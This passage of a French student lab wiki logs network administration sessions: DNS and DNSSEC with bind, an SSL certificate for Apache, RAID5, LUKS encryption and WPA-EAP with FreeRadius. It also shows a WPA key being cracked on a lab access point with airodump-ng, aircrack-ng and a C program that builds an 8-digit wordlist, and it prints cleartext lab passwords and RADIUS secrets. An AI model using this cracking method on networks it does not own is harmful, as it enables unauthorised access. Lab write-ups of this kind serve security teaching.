  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
